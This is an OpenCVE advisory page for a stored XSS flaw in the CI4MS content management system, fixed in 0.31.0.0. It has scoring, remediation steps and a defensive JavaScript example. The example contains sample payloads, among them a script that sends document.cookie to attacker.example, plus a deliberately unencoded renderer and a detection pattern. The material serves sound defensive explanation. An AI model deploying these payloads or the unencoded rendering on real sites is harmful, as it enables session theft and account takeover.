Description
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Page Management functionality when creating or editing pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side. These stored values are later rendered without proper output encoding across administrative page lists and public-facing page views, leading to stored DOM-based cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Published: 2026-04-01
Score: 9.1 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Stored DOM XSS capable of full account takeover and privilege escalation
Action: Immediate Patch
AI Analysis

Impact

CI4MS is a CodeIgniter 4-based CMS skeleton whose Page Management feature lets users create and edit pages. Prior to release 0.31.0.0 the application fails to properly sanitize user input in multiple page fields, stores the raw values server-side, and later renders them without output encoding in both the administrative page list and the public-facing page views. An attacker can therefore persist JavaScript that executes in the browser of an administrator reviewing the page list or of any visitor to the public page. The weakness is CWE-79 (improper neutralization of input during web page generation); the resulting stored XSS can lead to theft of session cookies, full account takeover, and privilege escalation.

Affected Systems

The vulnerability affects all CI4MS installations (vendor ci4-cms-erp, product ci4ms) running a version older than 0.31.0.0. The fix shipped in release 0.31.0.0; the advisory does not describe the change in detail. No other affected version range is documented, so every earlier release should be treated as vulnerable.

Risk and Exploitability

The CVSS 3.1 base score of 9.1 (Critical; vector AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L) reflects a network-reachable attack that needs only a low-privileged account and no user interaction, with a scope change: a payload stored by a page editor executes in the browser of any administrator viewing the page list or any visitor of the public page, so the impact crosses from the editor's own privileges into other users' sessions. The EPSS score below 1 % suggests a low near-term probability of exploitation in the wild, and the issue is not listed in CISA KEV; the SSVC record does, however, mark Exploitation as 'poc', so proof-of-concept exploit code exists. The attack vector is the page create/edit interface: an account permitted to create or edit pages injects the payload, and, per the advisory title, successful exploitation can take over accounts of any role, including administrators, which amounts to privilege escalation.

Generated by OpenCVE AI on April 6, 2026 at 19:47 UTC.

Remediation

The vendor fix is release 0.31.0.0, as stated in the advisory description; no separate workaround is documented.

OpenCVE Recommended Actions

  • Upgrade CI4MS to version 0.31.0.0 or later
  • If an upgrade is not immediately feasible, restrict the Page Management feature to a small set of trusted administrators and review stored page content for unexpected markup or script
  • If possible, apply context-appropriate output encoding (for example CodeIgniter's esc() helper) to every stored page field at the point of rendering, in both the admin page list and the public views; filtering input alone is not sufficient
  • Deploy a site-wide Content Security Policy whose script-src disallows inline scripts, to limit the impact of any injection that remains
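The following is an added illustration of the mechanism described in the Impact section and of the output-encoding recommendation above; it is not code from the CI4MS project or from this advisory. It assumes a page record with the fields title, slug and description (an assumption, since the advisory does not name the fields) and uses two constructed sample records, one benign and one carrying the kind of payload an account with page-edit rights could store. It contrasts a row renderer that concatenates stored values into markup with one that encodes each field for the context it lands in, and includes a coarse scanner for reviewing existing stored content.

```javascript
// Added illustration (not CI4MS project code): how a stored payload in a
// page-management record reaches the browser when fields are concatenated
// into markup, and how output encoding at render time neutralizes it.
// Field names (title, slug, description) and the records are assumptions.

// Constructed sample records: the first is benign, the second carries the
// kind of payload an account with page-edit rights could store.
const PAGES = [
  { id: 1, title: 'About us', slug: 'about', description: 'Company history' },
  {
    id: 2,
    title: '<img src=x onerror=alert(document.cookie)>',
    slug: 'x" onmouseover="alert(1)',
    description: '</td><script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  },
];

// HTML-context encoder covering the five characters that can break out of
// text or a double-quoted attribute (the same mapping CodeIgniter's esc()
// applies in its default 'html' context).
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// VULNERABLE: stored fields are interpolated directly into the admin list row.
// Whether this string is echoed by a server template or assigned to
// element.innerHTML client-side, the browser parses the payload as markup.
function renderRowVulnerable(page) {
  return `<tr><td>${page.title}</td>` +
    `<td><a href="/page/${page.slug}">${page.description}</a></td></tr>`;
}

// HARDENED: every field is encoded for the context it lands in. The slug is
// URL-encoded first (it becomes a path segment) and then HTML-encoded because
// it sits inside an attribute value; encodeURIComponent leaves the single
// quote alone, so the second step is not redundant.
function renderRowSafe(page) {
  return `<tr><td>${escapeHtml(page.title)}</td>` +
    `<td><a href="/page/${escapeHtml(encodeURIComponent(page.slug))}">` +
    `${escapeHtml(page.description)}</a></td></tr>`;
}

// Coarse triage for the "review stored content" recommendation: flags
// records containing tag openers, inline event handlers or javascript: URLs.
// It is a detection aid for reviewing existing data, not a substitute for
// output encoding, and it will miss obfuscated payloads.
const SUSPICIOUS = /<\s*\/?[a-z!]|\bon[a-z]+\s*=|javascript:/i;
function findSuspiciousPages(pages) {
  return pages
    .filter((p) => [p.title, p.slug, p.description].some((f) => SUSPICIOUS.test(String(f))))
    .map((p) => p.id);
}

// Returns true if rendered markup contains any tag other than the ones the
// row template itself emits, i.e. attacker-controlled markup survived.
function containsForeignTag(html) {
  return /<(?!\/?(tr|td|a)\b)/i.test(html);
}

console.log('vulnerable row:', renderRowVulnerable(PAGES[1]));
console.log('safe row:      ', renderRowSafe(PAGES[1]));
console.log('flagged ids:   ', findSuspiciousPages(PAGES));
```

Run with `node` to see the two rows side by side: in the vulnerable row the description closes the table cell and opens a script element, while in the safe row the same bytes are inert text. The same encoding must be applied on the public page view, not only in the admin list, since the advisory reports both sinks.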

Advisories

Source: GitHub GHSA
ID: GHSA-458r-h248-29c5
Title: CI4MS: Pages Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
History

Mon, 06 Apr 2026 16:45:00 +0000

CPEs (added): cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:*

Sat, 04 Apr 2026 05:00:00 +0000

Metrics (added): ssvc {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 02 Apr 2026 20:30:00 +0000

First time appeared (added): Ci4-cms-erp; Ci4-cms-erp ci4ms
Vendors & Products (added): Ci4-cms-erp; Ci4-cms-erp ci4ms

Wed, 01 Apr 2026 23:45:00 +0000

Description (added): CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Page Management functionality when creating or editing pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side. These stored values are later rendered without proper output encoding across administrative page lists and public-facing page views, leading to stored DOM-based cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Title (added): CI4MS: Pages Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
Weaknesses (added): CWE-79
References (added): none recorded
Metrics (added): cvssV3_1 {'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-04T03:15:36.218Z

Reserved: 2026-03-30T16:56:30.997Z

Link: CVE-2026-34566

Vulnrichment

Updated: 2026-04-04T03:15:30.419Z

NVD

Status : Analyzed

Published: 2026-04-01T22:16:20.263

Modified: 2026-04-06T16:42:22.200

Link: CVE-2026-34566

Red Hat

No data.

OpenCVE Enrichment

Updated: 2026-04-07T07:56:33Z

Weaknesses